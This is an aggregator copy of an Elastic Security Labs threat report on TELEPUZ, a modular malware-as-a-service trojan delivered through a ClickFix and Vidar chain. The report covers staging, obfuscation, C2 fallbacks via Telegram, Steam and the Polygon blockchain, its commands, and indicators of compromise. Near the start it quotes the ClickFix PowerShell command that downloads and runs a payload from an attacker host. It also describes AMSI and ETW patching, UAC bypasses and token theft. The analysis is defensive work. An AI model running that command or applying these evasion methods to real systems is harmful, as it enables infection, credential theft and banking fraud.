惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

SecWiki News
SecWiki News
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
V
Visual Studio Blog
博客园 - 叶小钗
S
SegmentFault 最新的问题
IT之家
IT之家
大猫的无限游戏
大猫的无限游戏
博客园_首页
Apple Machine Learning Research
Apple Machine Learning Research
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
月光博客
月光博客
酷 壳 – CoolShell
酷 壳 – CoolShell
腾讯CDC
D
Darknet – Hacking Tools, Hacker News & Cyber Security
V
V2EX
阮一峰的网络日志
阮一峰的网络日志
L
Lohrmann on Cybersecurity
量子位
C
Cyber Attacks, Cyber Crime and Cyber Security
T
Tor Project blog
J
Java Code Geeks
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
博客园 - 三生石上(FineUI控件)
Attack and Defense Labs
Attack and Defense Labs
AI
AI
The Cloudflare Blog
T
Tailwind CSS Blog
S
Schneier on Security
爱范儿
爱范儿
PCI Perspectives
PCI Perspectives
Stack Overflow Blog
Stack Overflow Blog
S
Secure Thoughts
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
T
The Exploit Database - CXSecurity.com
博客园 - 【当耐特】
V2EX - 技术
V2EX - 技术
S
Securelist
P
Proofpoint News Feed
T
Threat Research - Cisco Blogs
Help Net Security
Help Net Security
C
Cisco Blogs
N
News and Events Feed by Topic
人人都是产品经理
人人都是产品经理
B
Blog RSS Feed
K
Kaspersky official blog
T
The Blog of Author Tim Ferriss
G
Google Developers Blog
S
Security Affairs
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Simon Willison's Weblog
Simon Willison's Weblog

Elastic Security Labs

REF6045: Mexican banking fraud toolkit with signs of AI-assisted development — Elastic Security Labs Alert triage in under 3 minutes with Elastic's agentic SOC — Elastic Security Labs Security advisory automation with Elastic Agent Builder — Elastic Security Labs OXLOADER: new loader evading detection to drop infostealer — Elastic Security Labs Azure AD Graph Activity Logs: detecting directory enumeration — Elastic Security Labs From API key to live threat detections in minutes: how Elastic Security ingests Google Threat Intelligence Detecting Tycoon 2FA AiTM attacks across Entra ID and Google Workspace PHANTOMPULSE: anatomy of a hijackable blockchain-C2 RAT Elastic Security MCP App: Interactive security operations inside your AI Tools Copy Fail and DirtyFrag: Linux Page Cache Bugs in the Wild Detecting Web Server Probing & Fuzzing in Traefik with Automated Cloudflare Response TCLBANKER: Brazilian Banking Trojan Spreading via WhatsApp and Outlook Elastic Workflows GA: automation where your security data already lives Your UEBA is lying to you: Why entity record quality decides everything Know who to watch before the incident finds you AI-generated hunting leads: The hunt starts before you ask the question From plain English to production rule: AI-native Elasticsearch ES|QL detection in Elastic Security Elastic Conversational Entity Analytics: threat hunting in a single conversation One agent, the right skills: Elastic Security 9.4 brings domain expertise on demand to every SOC workflow DFIR: From alert to root cause using Osquery without leaving Elastic Security CI/CD pipeline abuse: the problem no one is watching — Elastic Security Labs Monitoring Claude Code/Cowork at scale with OTel in Elastic The Cost of Understanding: LLM-Driven Reverse Engineering vs Iterative LLM Obfuscation — Elastic Security Labs Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT — Elastic Security Labs Elastic on Defence Cyber Marvel 2026: A Technical overview from the Exercise Floor Elastic Security Integrations Roundup: Q1 2026 Prioritizing Alerts Triage with Higher-Order Detection Rules How we caught the Axios supply chain attack Hooked on Linux: Rootkit Detection Engineering Inside the Axios supply chain compromise - one RAT to rule them all Elastic releases detections for the Axios supply chain compromise Fake Installers to Monero: A Multi-Tool Mining Operation Elastic Security Labs uncovers BRUSHWORM and BRUSHLOGGER Illuminating VoidLink: Technical analysis of the VoidLink rootkit framework Investigating from the Endpoint Across Your Environment with Elastic Security XDR Security Automation with Elastic Workflows: From Alert to Response Streamlining the Security Analyst Experience Supercharge Your SOC Linux & Cloud Detection Engineering - TeamPCP Container Attack Scenario From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect Linux & Cloud Detection Engineering - Getting Started with Defend for Containers (D4C) Get started with Elastic Security from your AI agent Managing Elastic Security Detection Rules with Terraform Patch diff to SYSTEM
TELEPUZ: a modular MaaS malware spreading via CLICKFIX-VIDAR chains — Elastic Security Labs
Cyril François · 2026-07-16 · via Elastic Security Labs

Elastic Security Labs is tracking an emerging threat named TELEPUZ, which we have discovered spreading widely via a CLICKFIX-VIDAR chain. This malware is in active development and has been operating since late April 2026, according to the infrastructure information we collected. The malware is full-featured, lightweight, and modular. While the number of C2 domains is currently small, the daily volume of builds uploaded to VirusTotal and the rapid pace of updates indicate active development and likely further growth.

Key takeaways

  • Full-featured malware, modular, fast evolving
  • Possible new MaaS, spreading fast
  • Currently low number of C2 domains
  • Stagers, main payload, and additional modules; uses WebSockets for communication.
  • Observed delivered via a CLICKFIX-VIDAR campaign.

TELEPUZ infection chain via CLICKFIX-VIDAR

The infection chain begins with a ClickFix social engineering infection, in which the user visits a malicious web page and is prompted to copy and paste, then execute, a Windows shell command to access the page's content.

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -w h -ep bypass -c \
"$h='memsho'+'wblob[.]forum';$n='f322a5fa.exe';$u='https://'+$h+'/api/index.php?a=grab';\
$f=$env:TEMP+'\'+$n;[Net.WebClient]::new().('Down'+'loadFile')($u,$f);\
ri($f+':Zone.Identifier')-EA 0;& $f

The command downloads the second stage from the URL hxxps://memshowblob[.]forum/api/index.php?a=grab and executes the binary in the user's %TEMP% folder.

The second stage is a VIDAR Go variant (580b441e2961739fd26e54e0a0ea08351cb10a51839519fc722cfa39ecd0c954). VIDAR is a well-documented threat known for its ability to download and deploy secondary payloads. In this campaign, we observed it downloading and executing two additional components: the TELEPUZ stager (install.exe) and the main binary (telepuz.dll), both of which were retrieved from the hurgadatour[.]shop domain.

The telemetriawork part in the second-stage domain URL is a significant marker for this family; searching for this name on VirusTotal yields a large number of stagers and payloads associated with this family.

The third stage (03fa348b70819296c958c842e7646b3b7efe5fa217ed5098143003c47995a746) is a small PE, roughly 13–15 KB in size, designed to download and execute the main payload. After downloading the DLL, the stager installs it in the configured install folder and execute it using rundll32 with the specified export name. These stagers share the same obfuscation mechanism as the main payload, which we will analyze in the following chapter, effectively linking them to the same family.

TELEPUZ technical analysis and internals

The reference sample is 58aec6e3835aaf20f7b4a7e308b36a19e7454673a6f71783871e9bcf6cae8eed

The main payload is a 64-bit Windows shared library with one or two exports, whose names are systematically chosen to disguise the library as legitimate software. The malware is written in C, likely by hand, lightweight, modular, and the code quality is correct. The malware contains sparse memory allocations, little middleware, and some features still under development. These elements indicate that the project is led either by a solo developer or a very small team, and that coding is their core business. Given the significant number of builds uploaded to VirusTotal daily, it is likely that we are dealing with a MaaS.

Our sample contains the following exports:

TELEPUZ obfuscation techniques

Garbage instructions

The malware interleaves its actual code with “garbage instructions,” which have no functional purpose and are intended to slow down reverse engineering. However, some of these instructions are built to produce side effects, such as updating global variables or invoking Windows APIs, likely to ensure they are not optimized away by either the compiler or the disassembler as dead code. Fortunately, the IDA Pro decompiler does a good job at optimizing them, reducing the amount of clutter and rendering this obfuscation method largely ineffective.

Import hashing

TELEPUZ employs standard module and import name hashing to resolve its imports, which are dynamically loaded upon each invocation.

The hashing algorithm is described below:

def hash_module_name_wide(name):
    h = 0x97C2CA4B
    for c in name:
        b = ord(c) & 0xFF
        if 0x41 <= b <= 0x5A:
            b += 0x20
        h = ((h << 0x15) | (h >> 0x0B)) & 0xFFFFFFFF
        h = (h - b) & 0xFFFFFFFF
        h = (0x48076BB1 * h - 0x4767A3AB) & 0xFFFFFFFF
    return h

String encryption

TELEPUZ decrypts strings using a custom RC4 implementation, using constants that vary between samples. We developed an IDA script that uses the debugger's Appcall feature to instrument the decryption function and recover all strings. The IDA script is available here.

Indirect syscalls

TELEPUZ employs indirect syscalls for several of its activities. To initialize its indirect syscall engine, the malware maps a fresh copy of ntdll.dll into memory using ReadFile. It then iterates through the export table to identify specific functions, parsing their syscall number from their instructions.

Once the syscall numbers are collected, TELEPUZ generates “trampoline” stubs consisting of the syscall prelude followed by a jump to the address of a syscall;retn gadget.

Finally, the malware selects a random library from a set of standard libraries (dfscli.dll, davhlpr.dll, msdtclog.dll, dsrole.dll, and secur32.dll) and loads it via LoadLibrary. It then patches the library's .text section with the previously generated trampolines, so indirect syscalls are now executed from this location.

TELEPUZ execution flow and persistence installation

The malware's execution begins with its DllMain. The goal of this initial stage is to re-execute the malware using rundll32.exe with the appropriate export name, provided the current process is not already running as svchost.exe or rundll32.exe.

During the second execution, the ServiceRoutine export is triggered. This function serves as the primary malware entry point, responsible for installing persistence, initializing the indirect syscall engine, performing anti-VM and anti-debugger checks, elevating its privileges, installing itself as a service and finally initiating the C2 communication loop.

Upon execution, the malware first verifies if it is running from the %TEMP% folder. If so, it migrates to the designated persistence directory, which is distinct from the installation folder. While the stager typically handles writing the payload to the installation directory, the malware includes a fallback mechanism to copy itself to an %AppData% directory if this step has not yet been performed, re-run it from there and delete the current sample.

Next, the malware creates the mutex cfgmgr_mtx if it does not already exist. It then performs anti-VM and geolocation checks by verifying hardware constraints, such as whether the system has fewer than two CPUs, less than 2GB of memory, or insufficient disk space, and ensuring the system's locale identifier (LCID) is not among a hardcoded list of Commonwealth of Independent States (CIS) countries.

LCIDLanguageCountry
0x422UkrainianUkraine
0x423BelarusianBelarus
0x42BArmenianArmenia
0x42CAzerbaijaniAzerbaijan
0x428TajikTajikistan
0x437GeorgianGeorgia
0x43FKazakhKazakhstan
0x440KyrgyzKyrgyzstan
0x442TurkmenTurkmenistan
0x443UzbekUzbekistan
0x818RomanianMoldova

The malware subsequently compares the current username and computer name against a hardcoded list of common sandbox and malware research identifiers.

Usernames
sandbox, malware, virus, test, sample, cuckoo, bruno, jz, dekker, abby, wilbert, johnson, miller, harddisk, currentuser, john, tim, sand box, maltest, pjones, fred

Computer names
sandbox, virus, malware, tequilaboomboom, hal9th, john-pc, mueller-pc, hanspeter-pc, 7silvia, fortinet, wasp, mars, desk-ivruuh4y14, COMPUTERNAME

Finally, the malware compares the display device name against a list of known hypervisor identifiers.

If the malware identifies a virtualized environment or an unauthorized geographic location, it terminates execution immediately. Otherwise, it proceeds to initialize the indirect syscall engine and executes a series of evasion routines: NTDLL unhooking, AMSI and ETW patching, and the removal of DllNotification callbacks, to disable security monitoring.

To unhook NTDLL, TELEPUZ maps a fresh copy of the library using NtMapViewOfSection. It then compares the loaded exports against this clean copy, restoring any patched bytes. For AMSI evasion, it patches the AmsiScanBuffer function with ”mov eax, 0x80070057; retn, forcing the function to return E_INVALIDARG to the caller. Finally, to disable ETW, it patches EtwEventWrite, NtTraceEvent, and NtTraceEventControl with ”xor eax, eax; retn instructions, effectively forcing these functions to return zero.

To remove third party DllNotification callbacks, the malware registers a dummy function via LdrRegisterDllNotification to obtain a cookie. It then uses the resulting opaque structure to iterate through the linked list of registered callbacks, verifying whether each resides within a legitimate Windows library. If not it removes it.

Following the evasion routines, the malware initiates debugger detection. It utilizes NtQueryInformationProcess to inspect ProcessDebugPort, ProcessDebugFlags, and ProcessDebugObjectHandle. It then employs NtGetContextThread to verify if hardware breakpoints (DR0–DR7) are enabled. To further thwart analysis, it calls NtSetInformationThread with the ThreadHideFromDebugger flag and NtClose with 0xDEADBEEF to cause a debugger crash.

Finally, the malware retrieves the parent process ID and verifies the parent process name against a list of known runners, such as rundll32.exe and svchost.exe.

The detection sequence concludes by inspecting the PEB.BeingDebugged flag. If a debugger is identified, the malware calls the Sleep function with an INFINITE parameter.

Once the debugger detection sequence completes, the malware generates a unique session id/victim identifier. This identifier is derived by combining the hardware serial number, the computer name, and the operating system's installation date. The generation algorithm is detailed below.

FNV1_SEED = 0x811C9DC5
FNV1_PRIME = 0x01000193
ROR27_SEED = 0xA1B39854
GOLDEN_RATIO = 0x61C88647


def fnv1_32(data: bytes, h: int = FNV1_SEED) -> int:
    for b in data:
        h = (FNV1_PRIME * (h ^ b)) & 0xFFFFFFFF
    return h


def ror27_sub(data: bytes, h: int = ROR27_SEED) -> int:
    for b in data:
        v = (b ^ h) & 0xFFFFFFFF
        h = (((v >> 0x1B) | (v << 0x05)) - GOLDEN_RATIO) & 0xFFFFFFFF
    return h


def generate_session_id(computer_name: bytes, volume_serial: bytes, install_date: bytes) -> str:
    data = computer_name + volume_serial + install_date
    return "%08x%08x" % (fnv1_32(data), ror27_sub(data))

Following successful session identification, the malware spawns two concurrent threads: one dedicated to elevate itself and install the malware as a service, and the other to initiate the C2 communication loop. The installation thread starts by elevating itself as Admin using the COM elevation moniker technique. This technique involves creating an elevated COM object and using its ShellExecute method to spawn another elevated instance of the sample, thereby successfully bypassing UAC. A full implementation of this technique is available here.

We identified an alternative UAC bypass using AppInfo ALPC and DebugObjects. The malware first launches a non-elevated winver.exe in debug mode via RAicLaunchAdminProcess to capture its debug object handle. It then launches an auto-elevated computerdefault.exe in debug mode and attaches the captured handle using DbgUiSetThreadDebugObject. This grants the malware full access to the elevated process, allowing it to spawn rundll32.exe and execute itself with elevated privileges. A full implementation of this technique is available here.

Upon achieving elevation and depending on the configuration TELEPUZ next tries to get SYSTEM privilege by stealing the token of the first found process with one of the following names: spoolsv.exe, msdtc.exe, WmiPrvSE.exe, svchost.exe. Next it registers itself as a service by creating the necessary registry keys to instruct Windows to load the malware within a new svchost.exe instance. The malware again tries to masquerade as legitimate software with the service name CipherAllocator.

The second thread manages the C2 communication loop, handling command reception, execution, and data exfiltration. Communication protocols and command structures are detailed in the following sections.

TELEPUZ C2 communication

TELEPUZ's configuration contains a single C2 domain, which is initialized just before the generation of the session identifier.

In the communication thread, the sample attempts to establish contact with its C2 up to 10 times, if it fails, it attempts to retrieve a fallback C2 address using 4 different methods.

These fallback methods access public resources to retrieve new C2 URLs, allowing operators to update addresses if the primary URL fails. We identified the following methods:

Telegram method
TELEPUZ accesses the Telegram profile ”t[.]me/chanadarkpart, which contains the encrypted fallback URL.

The data is XOR-encrypted using the hardcoded key ”Goodman, the Steam profile and DNS record methods utilize this same encryption scheme. Decryption reveals the current C2 server at cal.snehamumbai[.]org. Examination of the channel messages indicates the channel was created in late April 2026.

Steam Profile
The second method is based on Steam profile usernames, the profile the malware is targeting is hxxps://steamcommunity[.]com//profiles/76561199705801219.

The profile name contains the same C2 address found in the Telegram channel. The profile's name history reveals both the C2 domain configured in the malware (cal.joycedoula[.]com[.]br) and this one again but encrypted with the key 111111111.

DNS record
The DNS record method does a DNS query for the domain codebasecode[.]com, it then extracts and decrypts the fallback C2 from the information returned. However so far we haven’t found any record associated with this domain.

Polygon blockchain
TELEPUZ initiates a JsonRPC HTTP POST request to the Polygon blockchain using pre-configured endpoints, targeting the smart contract address 0xf55Bea1FdCf1c3ABb39ab92567C09aC1BFf6753E with the method selector 0xc3f909d4.

{"jsonrpc":"2.0","id":1,"method":"eth_call","params":[{"to":"0xf55Bea1FdCf1c3ABb39ab92567C09aC1BFf6753E","data":"0xc3f909d4"},"latest"]}

From the returned result TELEPUZ parses the encrypted data and decrypt it using AES256-CBC with the key ”cee96a38e2dfe31ccf8c3aa7d0d9323e1e3183b2478ba582285822e943d242e9.

h=cal.snehamumbai[.]org|p=443|ssl=1

The smart contract also acts as a kill switch mechanism; if the returned result is fewer than 10 bytes, the malware calls ExitThread.

A review of the smart contract address on a blockchain explorer reveals when the contract got created and recent activity at the time of writing.

Once the C2 is resolved, it establishes communication using WebSockets with optional TLS. The WebSocket URL is /cdn/health?sid=, where the sid parameter is the session ID/victim identifier previously generated. Rather than using standard internet libraries, it manually establishes the connection via a TCP socket with hardcoded HTTP headers, and then uses the WebSocket protocol to communicate with the C2 server.

If TLS is enabled, the malware establishes the tunnel using the Secure Channel (SChannel) provided by the Windows Security Support Provider (SSP). To perform the handshake, it uses the InitializeSecurityContextA function in a loop. In each iteration, it generates TLS data to send to the C2, receives the server's response, and feeds that response back into the same function to generate the subsequent handshake data.

Once the WebSocket connection is established, the malware utilizes a simple JSON-based protocol. We implemented a very simple flask-sock server to receive the beacon data.

TELEPUZ commands and capabilities

TELEPUZ receives commands from its C2 server either as plain text or as a hash. If a command is received as text, the malware computes its corresponding hash locally. The hashing algorithm is described below:

def hash_command_name(name):
    h = 0x1505
    for c in name:
        h = (ord(c) ^ (0x21 * h)) & 0xFFFFFFFF
    return h

The malware currently has 36 commands, they are described in the table below:

HashCommand
0x7C82BBEBBeacon
0x94822A12CreateZip
0x98712C1CDelete
0x92D09E05DownloadFile
0x3098F2D8DownloadLoadMalwareModule
0xACD43E91, 0x0D9B6199DownloadRunPE
0xFF55DC66DownloadRunModule
0x1084A429DownloadStartKeyLogger
0xCA4A8C1DDownloadStartStealer
0x7117B24ADownloadStartWebInjectModule
0x4C9F6E6FElevateToAdmin
0x037825F6ElevateToSystem
0x99C81E9AEnumerateDriveInfo
0x69224E1AExecuteCommand
0xF6E8CE40ExtractChromeCookiesUsingDownloadedChromeElevator
0x2D858A03GetCurrentTokenStatus
0xDE853911GetKeyLoggerStatus
0x82E18E66GetPathsInfo
0xA823945AInjectShellcode
0x323BE80BKeyLoggerEnableDisableFormFlush
0x7C8B2DA7Kill
0xA5BD70FFKillJob
0xA5BAAA7FListJobs
0x005974C6ListRunningProcesses
0x0059735ALs
0x8BC0E38DMaybePrivescDisabled
0x7F593804MigrateIntoProcess
0xBCDE59A3RevertToken
0xA6EC9549Screenshot
0x77E0A2E7SetBeaconInterval
0xDED585EEStealProcessToken
0xF4040E98StopMalwareModule
0xB14E7AF4UpdateMalware
0xB152C246Upload
0xB70B7E99WriteToWebInjectModulePipe

To maintain a lightweight footprint, TELEPUZ downloads additional functional modules from its C2 server, such as stealer, keylogger, web injector, and cookie extraction modules for Chromium-based browsers.
Operators can specify a custom URI, though commands default to pre-configured values. For example, the ExtractChromeCookiesUsingDownloadedChromeElevator command retrieves a compiled binary of the Chrome-App-Bound-Encryption-Decryption project, defaulting to the path /static/assets/chromeelevator.bin.

The table below describes these default module URIs, they appear to be consistent across samples.

ModulePath
KeyLogger/static/modules/kMP6HBGEA8.bin
WebInjector/static/modules/yaVaoS3Bw.bin
Stealer/static/modules/W2UMxylgG\_.bin
ChromeCookie extractor/static/assets/chromelevator.bin

The WebInjector module is a PE executable that communicates with TELEPUZ via standard I/O handles (STDIN, STDOUT, STDERR). TELEPUZ transmits its configuration in JSON format to the module via STDIN. The following is an LLM-reconstructed version based on the identified fields.

{
  "wait_idle": "bool, default true",
  "idle_timeout_sec": "int, default 15",
  "auto_forward_timeout_ms": "int, default 30000",
  "probe_port_start": "int, default 9222",
  "probe_port_end": "int, default 9229",
  "force_kill_browser": "bool, default false",
  "attach_all_tabs": "bool, default true",
  "debug_reports": "bool, default true",
  "intercept_hold": "bool, default false",
  "attach_only": "bool, default false",
  "browser": "string[16], default 'chrome'",
  "c2_host": "string[256]",
  "c2_port": "int, default 0",
  "c2_ssl": "bool, default false",
  "bot_id": "string[64]",
  "sdk": "string[65536]",
  "intercept_filter": "string[256]",
  "targets": [
    {
      "url_match": "string[256]",
      "name": "string[64]"
    }
  ],
  "actions": [
    {
      "id": "string[64]",
      "type": "string[32]",
      "trigger": "string[32]",
      "trigger_url": "string[256]",
      "template": "string[32768]",
      "template_b64": "string[32768], base64 decoded into template",
      "grab_fields": "string[1024]",
      "delay_ms": "int, default 0",
      "once": "bool, default false",
      "request_stage": "bool, default true (swap_fields only)",
      "response_stage": "bool, default true (swap_fields only)",
      "fields": {
        "iban": "string[64]",
        "amount_max": "int, default 0",
        "field_name": "string[32], default 'iban'",
        "amount_field": "string[32], default 'amount'"
      },
      "response_filter": {
        "remove_where_iban": "string[64]"
      }
    }
  ]
}

The module can connect directly to the C2 via WebSocket on the URI /ws/inject?cid= if the connection information is provided in the configuration, allowing it to receive and execute commands directly. Otherwise, it relies on TELEPUZ as a middleman, using the WriteToWebInjectModulePipe command for communication. The module operates on Chromium-based browsers and Firefox. These commands allow the operator to control the injector, manage rules, steal cookies, execute JavaScript, and enable interception capabilities.

Despite its name, the WebInjector module does not need to inject into or hook the browser. Instead, it interacts with Chromium-based browsers using the Chrome DevTools Protocol (CDP), which exposes APIs for browser interaction. The Firefox equivalent is the WebDriver BiDi protocol. Based on the configuration, the module can intercept webpages at various stages to execute its “actions.” Default values appear centered on swapping form fields containing financial information, such as the IBAN.

TELEPUZ offers several methods for executing code. The DownloadRunPE command downloads a PE executable from a specified URL, creates a dllhost.exe process, with optional elevated privileges, and performs process hollowing with the downloaded PE. Optionally, it can also hollow its own process. The DownloadRunModule command is similar but retrieves the PE from the C2 using a provided path and tracks up to eight modules in a management table. The DownloadLoadMalwareModule command differs slightly: it loads a malware-compatible DLL with known exports, likely to add features or perform additional tasks.

Interestingly the shellcode process injection command is not yet implemented and currently returns INJECT:TODO:pid=%u:shellcode_len=%u, confirming that the malware is still in active development. Finally, the GetPathsInfo command provides detailed information about the malware's current installation.

PATHINFO:{"running_from":"C:\\Users\\Lab\\Desktop\\telepuz.dll","in_temp":false,"install_path":"C:\\ProgramData\\XeroxPrint\\Temp\\Worker\\grpeng.dll","install_exists":true,"stager_path":"C:\\Users\\Lab\\AppData\\Roaming\\D3DSCache\\amd64\\SvcValidator.dll","stager_exists":false,"persist_dir":"DCFG\\Runtime\\Themes\\Processor","persist_name":"etwhost.dll","marker_key":"Software\\Microsoft\\VisualStudio\\Telemetry","service_exists":true,"service_name":"CipherAllocator","host_process":"rundll32.exe","host_pid":5568}

TELEPUZ campaign timeline and C2 infrastructure

The first TELEPUZ sample was submitted on May 2, 2026. Since then, we have observed regular submissions of new builds, with a steady increase in binary size, and since early June, a significant spike in volume, confirming the campaign's high activity. However, dates from the Telegram channel and the Polygon smart contract indicate that activity began around April 27–29.

The download URLs typically follow the pattern /files/telemetriawork/telepuz.dll. However, variations exist, such as telemetry/network/telepuz.dll or /files/telemetrywork/telepuz. Interestingly, some early versions retained the /file/ structure but randomized the remainder of the path, for example, /files/xK7mR9pL2nQw5tY8/ygvfuyze.dll. The complete list is available in the IOCs chapter.

Although numerous domains host the malware's stages and main payload, C2 infrastructure is notably more limited. We have identified two primary domains: cal.joycedoula[.]com[.]br, which has been present in configurations since the earliest VirusTotal samples, and cal.snehamumbai[.]org, discovered through fallback methods. Interestingly, both utilize a 'cal.*' subdomain and appear to be legitimate websites compromised by the actor. Based on configuration history and fallback resolution, these domains constitute the core C2 infrastructure, distinct from the payload hosting locations. Their limited number suggests that what we think is a MaaS is still in its early stages, despite the high volume of builds generated. While the staging domains are protected by Cloudflare, concealing their true hosting locations, the C2 servers have been identified as compromised websites located in Brazil and India, respectively.

TELEPUZ indicators of compromise

The table below lists the staging domain and URLs for the second and third stages:

DomainFirst SeenURL
chubrik\[.\]sbs2026-05-09hxxps://chubrik\[.\]sbs/files/xK7mR9pL2nQw5tY8/ygvfuyze.dll
betalegenda\[.\]cfd2026-05-14hxxps://betalegenda\[.\]cfd/files/xK7mR9pL2nQw5tY8/kmwvogwx.dll
mavpaprokla\[.\]lat2026-05-19hxxps://mavpaprokla\[.\]lat/files/telemetriawork/telepuz.dll
comicstar\[.\]lat2026-05-26hxxps://comicstar\[.\]lat/files/telemetriawork/telepuz.dll
bigblower\[.\]click2026-05-28hxxps://bigblower\[.\]click/files/telemetriawork/telepuz.dll
momasites\[.\]lol2026-06-05hxxps://momasites\[.\]lol/files/telemetriawork/telepuz.dll
momasites\[.\]com2026-06-07hxxps://momasites\[.\]com/files/telemetrywork/telepuz
mamsites\[.\]lol2026-06-07hxxps://mamsites\[.\]lol/files/telemetrywork/telepuz.dll
hardenedom\[.\]shop2026-06-07hxxps://hardenedom\[.\]shop/files/telemetriawork/telepuz.dll
hardendedom\[.\]shop2026-06-07hxxps://hardendedom\[.\]shop/files/lemetriawork/epuz.dll
hardendom\[.\]shop2026-06-08hxxps://hardendom\[.\]shop/files/telemetry/telepuz.dll
hardeneddom\[.\]shop2026-06-10hxxps://hardeneddom\[.\]shop/files/telemetrywork/telepuz
netblokirovka\[.\]asia2026-06-11hxxps://netblokirovka\[.\]asia/files/telemetriawork/telepuz.dll
netblokir\[.\]asia2026-06-12hxxps://netblokir\[.\]asia/files/telemetriawork/telepuz.dll
netlobikrovka\[.\]asia2026-06-14hxxps://netlobikrovka\[.\]asia/files/telemetriawork/telepuz.dll
neblokirovka\[.\]as2026-06-15hxxps://neblokirovka\[.\]as/telemetry/network/telepuz.dll
kidsko\[.\]shop2026-06-17hxxps://kidsko\[.\]shop/files/telemetriawork/telepuz.dll
mazaporka\[.\]shop2026-06-22hxxps://mazaporka\[.\]shop/files/telemetriawork/telepuz.dll
172.67.215[.]2142026-06-24hxxps://172.67.215[.]214/files/telemetriawork/telepuz.dll
hurgadatour\[.\]shop2026-06-25hxxps://hurgadatour\[.\]shop/files/telemetriawork/telepuz.dll
krabsburger\[.\]xyz2026-06-29hxxp://krabsburger\[.\]xyz/files/telemetriawork/telepuz.dll
zewaplus\[.\]club2026-06-30hxxps://zewaplus\[.\]club/files/telemetriawork/telepuz.dll
172.67.165[.]1442026-07-06hxxps://172.67.165[.]144/files/telemetriawork/telepuz.dll

The table below lists the identified C2 infrastructure domains:

DomainNotes
cal.joycedoula[.]com[.]brPresent in configuration of earliest samples.
cal.snehamumbai[.]orgLatest C2

The table below list analyzed samples and their artifacts:

ArtifactType
58aec6e3835aaf20f7b4a7e308b36a19e7454673a6f71783871e9bcf6cae8eedReference TELEPUZ main payload
bf3b4e645a3c0c23f87c55971069014f7424ad14497371ee7567eff68ffaf343TELEPUZ main payload
ff791fe1532a2dc3b3c188a71bfd0177f973ef228e4d1dda1db6d3c4b0d62b3eTELEPUZ main payload
a955d7e2819d5fa8b5f879cb970e1a1a91327098a7383f2a03a5e1e7e19435e3TELEPUZ keylogger module
9733a3f6409de81271f21993c7f8b9865ac9f5c68c3d4336e91afe6b312477ebTELEPUZ stealer module
444f1c0c82b3f6cc31d685bac68b20edbde5722ce219af9cceab0c2a6537efc1TELEPUZ webinjector module
cfgmgr\_mtxmutex
bginfod\_mtxmutex
wfj64\_mtxmutex
%AppData%\\Local\\DCFG\\Runtime\\Themes\\Processor\\etwhost.dllpersistence
%AppData%\\Roaming\\StateRepository\\Host\\Recovery\\systemreset.dllpersistence
%AppData%\\Local\\MiravaDevices\\noraxrecovery.dllpersistence
%ProgramData%\\XeroxPrint\\Temp\\Worker\\grpeng.dllinstall
%ProgramData%\\Jundrax\\Tracker\\IrenScanner.dllinstall
%ProgramData%\\QualcommRF\\dsp\_agent.dllinstall
HKLM\\SYSTEM\\CurrentControlSet\\Services\\CipherAllocatorregistry
HKLM\\SYSTEM\\CurrentControlSet\\Services\\PilotmasterMastregistry

TELEPUZ MITRE ATT&CK tactics and techniques

Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that threats use against enterprise networks.

Tactics

Tactics represent the why of a technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.

Techniques

Techniques represent how an adversary achieves a tactical goal by performing an action.

TELEPUZ YARA detection rule

Windows_Trojan_Telepuz.yar